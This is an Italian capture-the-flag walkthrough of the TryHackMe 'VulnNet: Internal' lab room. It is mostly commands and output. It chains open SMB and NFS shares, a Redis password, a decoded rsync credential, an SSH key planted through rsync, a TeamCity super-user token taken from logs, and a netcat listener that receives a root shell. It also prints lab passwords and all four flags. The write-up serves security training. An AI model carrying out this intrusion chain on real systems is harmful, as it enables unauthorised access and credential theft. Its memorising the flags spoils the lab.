- Modificato
- Autore room: TheCyb3rW0lf
- Sistema operativo: Linux (obbligatorio)
- Difficoltà: Easy/Medium
LINK:https://tryhackme.com/room/vulnnetinternal
Descrizione:
VulnNet Entertainment è un'azienda che impara dai propri errori. Si sono subito resi conto che non potevano creare un'applicazione Web adeguatamente protetta, quindi hanno rinunciato a quell'idea. Invece, hanno deciso di istituire servizi interni per scopi commerciali. Come al solito, hai il compito di eseguire un penetration test della loro rete e segnalare i tuoi risultati.
Questa macchina è stata progettata per essere esattamente l'opposto delle macchine precedenti di questa serie e si concentra sui servizi interni. Dovrebbe mostrarti come recuperare informazioni interessanti e usarle per ottenere l'accesso al sistema. Segnala i tuoi risultati inviando i flag corretti.
INIZIAMO CON IL SCOPRIRE LA SERVICES FLAG:
Partiamo subito con una scansione su Nmap per le porte aperte:
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA) | 256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA) |_ 256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519) 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100003 3 2049/udp nfs | 100003 3 2049/udp6 nfs | 100003 3,4 2049/tcp nfs | 100003 3,4 2049/tcp6 nfs | 100005 1,2,3 35973/tcp mountd | 100005 1,2,3 50743/udp mountd | 100005 1,2,3 50821/tcp6 mountd | 100005 1,2,3 60228/udp6 mountd | 100021 1,3,4 33804/udp6 nlockmgr | 100021 1,3,4 35968/udp nlockmgr | 100021 1,3,4 38965/tcp6 nlockmgr | 100021 1,3,4 44305/tcp nlockmgr | 100227 3 2049/tcp nfs_acl | 100227 3 2049/tcp6 nfs_acl | 100227 3 2049/udp nfs_acl |_ 100227 3 2049/udp6 nfs_acl 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP) 873/tcp open rsync (protocol version 31) 2049/tcp open nfs_acl 3 (RPC #100227) 6379/tcp open redis Redis key-value store 9090/tcp filtered zeus-admin 35973/tcp open mountd 1-3 (RPC #100005) 39613/tcp open mountd 1-3 (RPC #100005) 42041/tcp open java-rmi Java RMI 44305/tcp open nlockmgr 1-4 (RPC #100021) 49833/tcp open mountd 1-3 (RPC #100005) Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Elenchiamo Samba:
┌──(user㉿parrot)-[/data/VulnNet_Internal] └─$ smbclient -L 10.10.190.83 Enter WORKGROUP\kali's password: Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers shares Disk VulnNet Business Shares IPC$ IPC IPC Service (vulnnet-internal server (Samba, Ubuntu)) SMB1 disabled -- no workgroup available
Ora fortunatamente possiamo accedere senza credenziali e leggere il contenuto del file services.txt che contiene la flag che ci serve:
┌──(user㉿parrot)-[/data/VulnNet_Internal] └─$ smbclient //10.10.190.83/shares Enter WORKGROUP\kali's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Tue Feb 2 10:20:09 2021 .. D 0 Tue Feb 2 10:28:11 2021 temp D 0 Sat Feb 6 12:45:10 2021 data D 0 Tue Feb 2 10:27:33 2021 11309648 blocks of size 1024. 3275768 blocks available smb: \> cd temp smb: \temp\> ls . D 0 Sat Feb 6 12:45:10 2021 .. D 0 Tue Feb 2 10:20:09 2021 services.txt N 38 Sat Feb 6 12:45:09 2021 11309648 blocks of size 1024. 3275768 blocks available smb: \temp\> get services.txt - THM{0a09d51e488f5fa105d8d866a497440a} getting file \temp\services.txt of size 38 as - (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
Abbiamo quindi trovato la FLAG:
THM{0a09d51e488f5fa105d8d866a497440a}
PROCEDIAMO CON LA INTERNAL FLAG:
La scansione di Nmap ha rivelato una condivisione NFS:
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ mkdir tmp/
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ sudo mount -t nfs 10.10.190.83: tmp
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ tree tmp
tmp
└── opt
└── conf
├── hp
│ └── hplip.conf
├── init
│ ├── anacron.conf
│ ├── lightdm.conf
│ └── whoopsie.conf
├── opt
├── profile.d
│ ├── bash_completion.sh
│ ├── cedilla-portuguese.sh
│ ├── input-method-config.sh
│ └── vte-2.91.sh
├── redis
│ └── redis.conf
├── vim
│ ├── vimrc
│ └── vimrc.tiny
└── wildmidi
└── wildmidi.cfg
Attenzione che il file redis.conf contiene la password per il server Redis:
┌──(user㉿parrot)-[/data/…/files/opt/conf/redis] └─$ grep -Ev "^#|^$" redis.conf rename-command FLUSHDB "" rename-command FLUSHALL "" bind 127.0.0.1 ::1 protected-mode yes port 6379 tcp-backlog 511 timeout 0 tcp-keepalive 300 daemonize yes supervised no pidfile /var/run/redis/redis-server.pid loglevel notice logfile /var/log/redis/redis-server.log databases 16 always-show-logo yes save 900 1 save 300 10 save 60 10000 stop-writes-on-bgsave-error yes rdbcompression yes rdbchecksum yes dbfilename dump.rdb dir /var/lib/redis slave-serve-stale-data yes requirepass "B65Hx562F@ggAZ@F" <-------------------- password slave-read-only yes repl-diskless-sync no repl-diskless-sync-delay 5 repl-disable-tcp-nodelay no slave-priority 100 lazyfree-lazy-eviction no lazyfree-lazy-expire no lazyfree-lazy-server-del no slave-lazy-flush no appendonly no appendfilename "appendonly.aof" appendfsync everysec no-appendfsync-on-rewrite no auto-aof-rewrite-percentage 100 auto-aof-rewrite-min-size 64mb aof-load-truncated yes aof-use-rdb-preamble no lua-time-limit 5000 slowlog-log-slower-than 10000 slowlog-max-len 128 latency-monitor-threshold 0 notify-keyspace-events "" hash-max-ziplist-entries 512 hash-max-ziplist-value 64 list-max-ziplist-size -2 list-compress-depth 0 set-max-intset-entries 512 zset-max-ziplist-entries 128 zset-max-ziplist-value 64 hll-sparse-max-bytes 3000 activerehashing yes client-output-buffer-limit normal 0 0 0 client-output-buffer-limit slave 256mb 64mb 60 client-output-buffer-limit pubsub 32mb 8mb 60 hz 10 aof-rewrite-incremental-fsync yes
Analizziamo il file per la flag:
┌──(user㉿parrot)-[/data/…/files/opt/conf/redis] └─$ redis-cli -h 10.10.190.83 -a "B65Hx562F@ggAZ@F" Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe. 10.10.190.83:6379> ping PONG 10.10.190.83:6379> KEYS * 1) "tmp" 2) "marketlist" 3) "authlist" 4) "internal flag" 5) "int" 10.10.190.83:6379> 10.10.190.83:6379> KEYS "internal flag" 1) "internal flag" 10.10.190.83:6379> GET "internal flag" "THM{ff8e518addbbddb74531a724236a8221}"
La flag è:
THM{ff8e518addbbddb74531a724236a8221}
USER FLAG:
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ redis-cli -h 10.10.190.83 -a "B65Hx562F@ggAZ@F"
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.190.83:6379> KEYS *
1) "internal flag"
2) "authlist"
3) "marketlist"
4) "int"
5) "tmp"
10.10.190.83:6379> GET authlist
(error) WRONGTYPE Operation against a key holding the wrong kind of value
10.10.190.83:6379> LRANGE authlist 1 100
1) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
2) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
3) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
10.10.190.83:6379>
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ echo "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" | base64 -d
Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ rsync --list-only rsync://10.10.190.83 23 ⨯
files Necessary home interaction
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ rsync --list-only rsync://10.10.190.83 23 ⨯
files Necessary home interaction
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ cp ~/.ssh/id_rsa.pub authorized_keys
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ rsync authorized_keys rsync://rsync-connect@10.10.190.83/files/sys-internal/.ssh 3 ⨯
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ ssh sys-internal@10.10.190.83
sys-internal@vulnnet-internal:~$ cat user.txt
THM{da7c20696831f253e0afaca8b83c07ab}
USER FLAG: THM{da7c20696831f253e0afaca8b83c07ab}
⠀
⠀
⠀
ROOT FLAG:
sys-internal@vulnnet-internal:/$ ls -la /
total 533824
drwxr-xr-x 24 root root 4096 Feb 6 12:58 ./
drwxr-xr-x 24 root root 4096 Feb 6 12:58 ../
drwxr-xr-x 2 root root 4096 Feb 2 14:05 bin/
drwxr-xr-x 3 root root 4096 Feb 1 14:02 boot/
drwx------ 2 root root 4096 Feb 1 13:41 .cache/
drwxr-xr-x 17 root root 3720 May 27 07:34 dev/
drwxr-xr-x 129 root root 12288 Feb 7 19:21 etc/
drwxr-xr-x 3 root root 4096 Feb 1 13:51 home/
lrwxrwxrwx 1 root root 34 Feb 1 14:01 initrd.img -> boot/initrd.img-4.15.0-135-generic
lrwxrwxrwx 1 root root 33 Feb 1 13:30 initrd.img.old -> boot/initrd.img-4.15.0-20-generic
drwxr-xr-x 18 root root 4096 Feb 1 13:43 lib/
drwxr-xr-x 2 root root 4096 Feb 1 13:28 lib64/
drwx------ 2 root root 16384 Feb 1 13:27 lost+found/
drwxr-xr-x 4 root root 4096 Feb 2 10:49 media/
drwxr-xr-x 2 root root 4096 Feb 1 13:27 mnt/
drwxr-xr-x 4 root root 4096 Feb 2 10:28 opt/
dr-xr-xr-x 136 root root 0 May 27 07:33 proc/
drwx------ 8 root root 4096 Feb 6 13:32 root/
drwxr-xr-x 27 root root 880 May 27 08:37 run/
drwxr-xr-x 2 root root 4096 Feb 2 14:06 sbin/
drwxr-xr-x 2 root root 4096 Feb 1 13:27 srv/
-rw------- 1 root root 546529280 Feb 1 13:27 swapfile
dr-xr-xr-x 13 root root 0 May 27 08:39 sys/
drwxr-xr-x 12 root root 4096 Feb 6 13:30 TeamCity/ <----------------------- interesting
drwxrwxrwt 11 root root 4096 May 27 08:40 tmp/
drwxr-xr-x 10 root root 4096 Feb 1 13:27 usr/
drwxr-xr-x 13 root root 4096 Feb 1 13:43 var/
lrwxrwxrwx 1 root root 31 Feb 1 14:01 vmlinuz -> boot/vmlinuz-4.15.0-135-generic
lrwxrwxrwx 1 root root 30 Feb 1 13:30 vmlinuz.old -> boot/vmlinuz-4.15.0-20-generic
sys-internal@vulnnet-internal:~$ ss -ltp
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 50 0.0.0.0:microsoft-ds 0.0.0.0:*
LISTEN 0 128 0.0.0.0:39391 0.0.0.0:*
LISTEN 0 64 0.0.0.0:nfs 0.0.0.0:*
LISTEN 0 128 0.0.0.0:33735 0.0.0.0:*
LISTEN 0 5 0.0.0.0:rsync 0.0.0.0:*
LISTEN 0 50 0.0.0.0:netbios-ssn 0.0.0.0:*
LISTEN 0 128 0.0.0.0:6379 0.0.0.0:*
LISTEN 0 128 0.0.0.0:sunrpc 0.0.0.0:*
LISTEN 0 64 0.0.0.0:34769 0.0.0.0:*
LISTEN 0 128 127.0.0.53%lo:domain 0.0.0.0:*
LISTEN 0 128 0.0.0.0:ssh 0.0.0.0:*
LISTEN 0 5 127.0.0.1:ipp 0.0.0.0:*
LISTEN 0 128 0.0.0.0:33145 0.0.0.0:*
LISTEN 0 50 [::ffff:127.0.0.1]:57882 *:*
LISTEN 0 50 [::]:microsoft-ds [::]:*
LISTEN 0 64 [::]:nfs [::]:*
LISTEN 0 50 *:9090 *:*
LISTEN 0 1 [::ffff:127.0.0.1]:8105 *:*
LISTEN 0 5 [::]:rsync [::]:*
LISTEN 0 128 [::1]:6379 [::]:*
LISTEN 0 50 [::]:netbios-ssn [::]:*
LISTEN 0 100 [::ffff:127.0.0.1]:8111 *:* <------------ TeamCity running on localhost on port 8111
LISTEN 0 128 [::]:sunrpc [::]:*
LISTEN 0 64 [::]:33363 [::]:*
LISTEN 0 128 [::]:40659 [::]:*
LISTEN 0 128 [::]:ssh [::]:*
LISTEN 0 50 *:35095 *:*
LISTEN 0 128 [::]:38359 [::]:*
LISTEN 0 5 [::1]:ipp [::]:*
LISTEN 0 128 [::]:46425 [::]:*
$ ssh -L 8111:127.0.0.1:8111 sys-internal@10.10.190.83
sys-internal@vulnnet-internal:/TeamCity$ grep -iR token /TeamCity/logs/ 2>/dev/null
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 3782562599667957776 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 4174796436262174108 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 4174796436262174108 (use empty username with the token as the password to access the server)
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.190.83] 48482
bash: cannot set terminal process group (481): Inappropriate ioctl for device
bash: no job control in this shell
root@vulnnet-internal:/TeamCity/buildAgent/work/2b35ac7e0452d98f# cat /root/root.txt
<uildAgent/work/2b35ac7e0452d98f# cat /root/root.txt
THM{e8996faea46df09dba5676dd271c60bd}
ROOT FLAG: THM{e8996faea46df09dba5676dd271c60bd}